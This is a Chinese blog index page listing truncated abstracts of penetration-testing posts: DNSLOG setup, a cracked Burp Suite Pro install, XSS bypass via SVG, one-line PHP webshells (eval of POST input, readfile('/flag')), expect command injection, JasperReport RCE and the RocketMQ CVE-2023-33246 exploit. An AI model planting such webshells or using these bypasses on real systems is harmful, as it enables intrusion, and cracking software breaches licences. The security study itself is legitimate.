会员
周边
新闻
博问
闪存
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
snad
博客园
首页
新随笔
联系
订阅
管理
上一页
1
2
3
4
5
6
下一页
2023年9月11日
使用RestTemplate发送POST请求
摘要: 一、添加RestTemplate依赖 在使用RestTemplate之前,需要向项目中添加相应的依赖。在Maven项目中,可以在pom.xml文件中添加以下依赖: <dependency> <groupId>org.springframework.boot</groupId> <artifactId
阅读全文
posted @ 2023-09-11 14:25 少年阿丁
阅读(11926)
评论(0)
推荐(1)
2023年9月6日
DNSLOG搭建(java)
摘要: Bridge 无回显漏洞测试辅助平台 (Spring Boot + Spring Security + Netty) 平台使用Java编写,提供DNSLOG,HTTPLOG等功能,辅助渗透测试过程中无回显漏洞及SSRF等漏洞的验证和利用。 https://github.com/SPuerBRead/
阅读全文
posted @ 2023-09-06 16:56 少年阿丁
阅读(279)
评论(0)
推荐(0)
2023年9月5日
Burpsuit专业版安装指导
摘要: Burpsuit专业版安装指导(破解) 1、下载并安装Burpsuit专业版 burpsuite官网下载链接:https://portswigger.net/burp/releases 注意:下载V2022.09之前的版本,否则后面破解失败,我下载的是 V2022.8.5 下载了专业版的burpsu
阅读全文
posted @ 2023-09-05 09:31 少年阿丁
阅读(1941)
评论(1)
推荐(0)
2023年8月29日
URL组成
摘要: URL(Uniform Resource Locator,统一资源定位符),作为网络资源的标准名称,使用一系列的信息标识来帮助我们定位网络资源,同时也告诉我们如何来获取资源。 实际上,URL是URI(Uniform Resource Identifier,统一资源标识符)的子集,URI作为一个基本概
阅读全文
posted @ 2023-08-29 15:08 少年阿丁
阅读(181)
评论(0)
推荐(0)
2023年8月28日
js脚本发起请求的方式
摘要: 一、使用XMLHttpRequest发起请求 <script> console.log("使用XMLHttpRequest发起请求"); var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://ccc.4.dns.snadfml.cn/http
阅读全文
posted @ 2023-08-28 15:58 少年阿丁
阅读(494)
评论(0)
推荐(0)
2023年8月23日
利用svg标签绕过xss校验(冷门方式)
摘要: SVG中的<use>元素用于重用其他元素,主要用于联接<defs>和alike,而我们却用它来引用外部SVG文件中的元素元素通过其id被引用,在<use>标签的xlink:href属性中以'#'井字符开头,外部元素的引用同样如此基本结构如下所示: test.html <svg> <use xlink
阅读全文
posted @ 2023-08-23 09:54 少年阿丁
阅读(2118)
评论(0)
推荐(0)
2023年8月9日
各种语言的一句话木马
摘要: 各种语言的一句话木马 PHP 上传xx.php 内容: 1.<?php @eval($_POST['shell']);?> 2.<?php @eval($_GET['shell']);?> 3.<?php phpinfo();?> 4.<?php readfile('/flag');?>//读取文件
阅读全文
posted @ 2023-08-09 17:50 少年阿丁
阅读(755)
评论(0)
推荐(0)
2023年7月21日
expect命令注入
摘要: 基础知识 Expect 是 Unix 系统中用来进行自动化控制和测试的软件工具 , 作为 Tcl 脚本语言的一个扩展,应用在交互式软件中 spawn命令启动新的进程来进行交互式的运行,spawn后的send和expect命令都是和spawn打开的进程进行交互的。 send命令接收一个字符串参数,并将
阅读全文
posted @ 2023-07-21 11:12 少年阿丁
阅读(432)
评论(0)
推荐(0)
2023年7月19日
(Jasper注入)上传jrxml模板进行JasperReport解析导致任意代码执行RCE
摘要: JasperReport是一个强大、灵活的报表生成工具,能够展示丰富的页面内容,并将之转换成PDF、HTML、XML等格式。该库完全由Java写成,可以用于在各种Java应用程序,包括J2EE,Web应用程序中生成动态内容。JasperReports附带了报表编译器,可以在报表表达式内部使用Groo
阅读全文
posted @ 2023-07-19 16:58 少年阿丁
阅读(1258)
评论(0)
推荐(0)
2023年7月18日
CVE-2023-33246 RocketMQ 远程命令执行漏洞分析
摘要: 2023年5月23日, Rocketmq 爆出 CVE-2023-33246 RCE高危漏洞。 在一定条件下, 攻击者可以利用该漏洞通过更新配置功能以RocketMQ运行的系统用户身份执行命令 。 漏洞利用与复现 攻击者成功RCE需要满足以下条件 Rocketmq 版本 < 5.1.1 或 < 4.
阅读全文
posted @ 2023-07-18 14:03 少年阿丁
阅读(2289)
评论(0)
推荐(0)
上一页
1
2
3
4
5
6
下一页
公告